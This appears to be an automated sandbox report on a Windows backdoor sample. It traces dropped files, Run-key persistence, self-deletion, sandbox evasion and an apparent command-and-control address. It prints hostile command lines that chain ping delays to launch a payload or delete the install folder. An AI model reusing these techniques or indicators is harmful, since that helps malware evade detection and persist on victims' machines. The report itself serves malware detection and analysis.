Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, type: DROPPED	Matched rule: CN_Honker_Webshell date = 2015-06-23, author = Florian Roth (Nextron Systems), description = Sample from CN Honker Pentest Toolset - file Webshell.exe, score = c85bd09d241c2a75b4e4301091aa11ddd5ad6d59, reference = Disclosed CN Honker Pentest Toolset, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE

Source: C:\Users\user\Desktop\02hNixBIvP.exe	Code function: String function: 004153D0 appears 120 times
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	Code function: String function: 004153D0 appears 120 times

Source: C:\Program Files\lhnfbdjfh\hcl.exe

Process Stats: CPU usage > 98%

Source: Joe Sandbox View

Dropped File: C:\Program Files\lhnfbdjfh\hcl.exe 4E15AA13A02798E924C63537E458A09415C48DAE0E7AFD5A3D25532A2AA935EE

Source: 02hNixBIvP.exe	ReversingLabs: Detection: 92%
Source: 02hNixBIvP.exe	Virustotal: Detection: 78%

Source: C:\Users\user\Desktop\02hNixBIvP.exe

File read: C:\Users\user\Desktop\02hNixBIvP.exe

Jump to behavior

Source: C:\Users\user\Desktop\02hNixBIvP.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\02hNixBIvP.exe C:\Users\user\Desktop\02hNixBIvP.exe
Source: C:\Users\user\Desktop\02hNixBIvP.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 2&C:\Users\user\AppData\Local\Temp\\ifaie.exe "C:\Users\user\Desktop\02hNixBIvP.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ifaie.exe C:\Users\user\AppData\Local\Temp\\ifaie.exe "C:\Users\user\Desktop\02hNixBIvP.exe"
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	Process created: C:\Program Files\lhnfbdjfh\hcl.exe "c:\Program Files\lhnfbdjfh\hcl.exe" "c:\Program Files\lhnfbdjfh\hclyc.dll",Hlink C:\Users\user\AppData\Local\Temp\ifaie.exe
Source: unknown	Process created: C:\Program Files\lhnfbdjfh\hcl.exe "C:\Program Files\lhnfbdjfh\hcl.exe" "c:\Program Files\lhnfbdjfh\hclyc.dll",Hlink
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\Program Files\lhnfbdjfh"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown	Process created: C:\Program Files\lhnfbdjfh\hcl.exe "C:\Program Files\lhnfbdjfh\hcl.exe" "c:\Program Files\lhnfbdjfh\hclyc.dll",Hlink
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\Program Files\lhnfbdjfh"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\02hNixBIvP.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 2&C:\Users\user\AppData\Local\Temp\\ifaie.exe "C:\Users\user\Desktop\02hNixBIvP.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ifaie.exe C:\Users\user\AppData\Local\Temp\\ifaie.exe "C:\Users\user\Desktop\02hNixBIvP.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	Process created: C:\Program Files\lhnfbdjfh\hcl.exe "c:\Program Files\lhnfbdjfh\hcl.exe" "c:\Program Files\lhnfbdjfh\hclyc.dll",Hlink C:\Users\user\AppData\Local\Temp\ifaie.exe	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\Program Files\lhnfbdjfh"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\Program Files\lhnfbdjfh"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior

Source: C:\Program Files\lhnfbdjfh\hcl.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\02hNixBIvP.exe

File created: C:\Users\user\AppData\Local\Temp\ifaie.exe

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@22/4@23/6

Source: C:\Program Files\lhnfbdjfh\hcl.exe	Mutant created: \Sessions\1\BaseNamedObjects\107.163.56.251:6658
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Mutant created: \Sessions\1\BaseNamedObjects\0x5d65r455f
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Mutant created: \Sessions\1\BaseNamedObjects\M107.163.56.251:6658
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_01

Source: C:\Users\user\Desktop\02hNixBIvP.exe

Code function: 0_2_004013B9 FindResourceA,LoadResource,

0_2_004013B9

Source: C:\Users\user\AppData\Local\Temp\ifaie.exe

File created: c:\Program Files\lhnfbdjfh

Jump to behavior

Source: C:\Program Files\lhnfbdjfh\hcl.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	Directory created: c:\Program Files\lhnfbdjfh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	Directory created: c:\Program Files\lhnfbdjfh\hclyc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	Directory created: c:\Program Files\lhnfbdjfh\hcl.exe	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Directory created: c:\Program Files\lhnfbdjfh\12032311	Jump to behavior

Source:	Binary string: rundll32.pdb source: hcl.exe, 00000005.00000002.524559673.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe, 00000011.00000002.341464281.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe, 00000015.00000000.354210355.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe.4.dr
Source:	Binary string: rundll32.pdbGCTL source: hcl.exe, 00000005.00000002.524559673.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe, 00000011.00000002.341464281.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe, 00000015.00000000.354210355.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe.4.dr

Source: C:\Users\user\Desktop\02hNixBIvP.exe	Code function: 0_2_00415390 push eax; ret	0_2_004153BE
Source: C:\Users\user\Desktop\02hNixBIvP.exe	Code function: 0_2_00417CC8 push ds; retf	0_2_00417CC9
Source: C:\Users\user\Desktop\02hNixBIvP.exe	Code function: 0_2_00417ED8 pushad ; retn 0040h	0_2_00417ED9
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	Code function: 4_2_0042725C push ecx; ret	4_2_0042725E
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	Code function: 4_2_00428280 push dword ptr [esp+28h]; retn 002Ch	4_2_00429F26
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	Code function: 4_2_00415390 push eax; ret	4_2_004153BE
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	Code function: 4_2_00427AE4 pushfd ; mov dword ptr [esp], 4876F1E8h	4_2_0044BBDB
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	Code function: 4_2_00417CC8 push ds; retf	4_2_00417CC9
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	Code function: 4_2_00417ED8 pushad ; retn 0040h	4_2_00417ED9
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	Code function: 4_2_0044BFB8 push dword ptr [esp+40h]; retn 0044h	4_2_0044BFDC

Source: 02hNixBIvP.exe	Static PE information: section name: DINGBOY
Source: 02hNixBIvP.exe	Static PE information: section name: DINGBOY
Source: ifaie.exe.0.dr	Static PE information: section name: DINGBOY
Source: ifaie.exe.0.dr	Static PE information: section name: DINGBOY
Source: hclyc.dll.4.dr	Static PE information: section name: .oo0
Source: hclyc.dll.4.dr	Static PE information: section name: .oo1
Source: hcl.exe.4.dr	Static PE information: section name: .didat

Source: initial sample

Static PE information: section where entry point is pointing to: DINGBOY

Source: initial sample	Static PE information: section name: DINGBOY entropy: 7.909826423981474
Source: initial sample	Static PE information: section name: DINGBOY entropy: 7.909826423981474
Source: initial sample	Static PE information: section name: .oo1 entropy: 7.863884058526312

Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	File created: C:\Program Files\lhnfbdjfh\hcl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\02hNixBIvP.exe	File created: C:\Users\user\AppData\Local\Temp\ifaie.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	File created: C:\Program Files\lhnfbdjfh\hclyc.dll	Jump to dropped file

Source: C:\Program Files\lhnfbdjfh\hcl.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Hali			Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Hali			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Users\user\AppData\Local\Temp\ifaie.exe

File deleted: c:\users\user\desktop\02hnixbivp.exe

Jump to behavior

Source: C:\Users\user\Desktop\02hNixBIvP.exe	Code function: 0_2_00401A9F IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,		0_2_00401A9F
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	Code function: 4_2_00401A9F IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,		4_2_00401A9F

Source: C:\Users\user\Desktop\02hNixBIvP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\02hNixBIvP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\02hNixBIvP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior

Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 3508	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 5176	Thread sleep count: 248 > 30	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 5176	Thread sleep time: -446400000s >= -30000s	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 5208	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 6348	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 6352	Thread sleep time: -1200000s >= -30000s	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 6392	Thread sleep time: -1980000s >= -30000s	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 6380	Thread sleep time: -4800000s >= -30000s	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 6544	Thread sleep count: 231 > 30	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 6544	Thread sleep time: -69300000s >= -30000s	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 6312	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 6316	Thread sleep time: -3600000s >= -30000s	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 5208	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 5176	Thread sleep time: -1800000s >= -30000s	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 6544	Thread sleep time: -300000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Last function: Thread delayed
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\ifaie.exe

Code function: 4_2_0044AB60 rdtsc

4_2_0044AB60

Source: C:\Program Files\lhnfbdjfh\hcl.exe	Thread delayed: delay time: 1800000	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Thread delayed: delay time: 1800000	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Thread delayed: delay time: 300000	Jump to behavior

Source: C:\Program Files\lhnfbdjfh\hcl.exe

File opened: PHYSICALDRIVE0

Jump to behavior

Source: C:\Program Files\lhnfbdjfh\hcl.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\02hNixBIvP.exe

Code function: 0_2_00414FFF VirtualQuery,GetSystemInfo,VirtualFree,VirtualAlloc,VirtualProtect,

0_2_00414FFF

Source: C:\Program Files\lhnfbdjfh\hcl.exe	Thread delayed: delay time: 1800000	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Thread delayed: delay time: 1800000	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Thread delayed: delay time: 300000	Jump to behavior

Source: C:\Users\user\Desktop\02hNixBIvP.exe	API call chain: ExitProcess graph end node			graph_0-10637
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe	API call chain: ExitProcess graph end node			graph_4-10886

Source: C:\Program Files\lhnfbdjfh\hcl.exe	File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\microsoft.system.package.metadata\	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	File opened: C:\Program Files\WindowsApps\Deleted\	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\AppTiles\	Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\	Jump to behavior

Source: hcl.exe, 00000005.00000002.524725974.000000000269B000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: s\Applications\\VMwareHo
Source: hcl.exe, 00000005.00000003.327430879.0000000002BD7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: y\Machine\Software\Classes\Applications\\VMwareHostOpen.exes\Applications\\VMwareHostOpen.exeion\\Run\User Shell Foldersockdown_Zones\4
Source: hcl.exe, 00000005.00000002.524951045.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: hcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 107.163.56.232OW64\WindowsPowerShell\v1.0\Modules\Hyper-V\.{
Source: hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWindows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;

Source: C:\Users\user\AppData\Local\Temp\ifaie.exe

Code function: 4_2_0044AB60 rdtsc

4_2_0044AB60

Source: C:\Program Files\lhnfbdjfh\hcl.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ifaie.exe C:\Users\user\AppData\Local\Temp\\ifaie.exe "C:\Users\user\Desktop\02hNixBIvP.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Program Files\lhnfbdjfh\hcl.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\02hNixBIvP.exe

Code function: 0_2_004150B3 GetVersionExA,

0_2_004150B3

Stealing of Sensitive Information

Queries disk data (e.g. SMART data)

Source: C:\Program Files\lhnfbdjfh\hcl.exe	Device IO: \Device\Harddisk0\DR0			Jump to behavior
Source: C:\Program Files\lhnfbdjfh\hcl.exe	Device IO: \Device\Harddisk0\DR0			Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	11 Process Injection	2 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Non-Standard Port	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	11 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Software Packing	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 File Deletion	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	133 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
02hNixBIvP.exe	92%	ReversingLabs	Win32.Backdoor.Venik
02hNixBIvP.exe	78%	Virustotal		Browse
02hNixBIvP.exe	100%	Avira	TR/Crypt.XPACK.Gen
02hNixBIvP.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\ifaie.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Program Files\lhnfbdjfh\hclyc.dll	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Temp\ifaie.exe	100%	Joe Sandbox ML
C:\Program Files\lhnfbdjfh\hclyc.dll	100%	Joe Sandbox ML
C:\Program Files\lhnfbdjfh\hcl.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.0.ifaie.exe.400000.0.unpack	100%	Avira	ADSPY/AdSpy.Gen	Download File
0.0.02hNixBIvP.exe.400000.0.unpack	100%	Avira	ADSPY/AdSpy.Gen	Download File
0.2.02hNixBIvP.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.ifaie.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.hcl.exe.10000000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
blogx.sina.com.cn	0%	Virustotal		Browse
blog.sina.com.cn	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
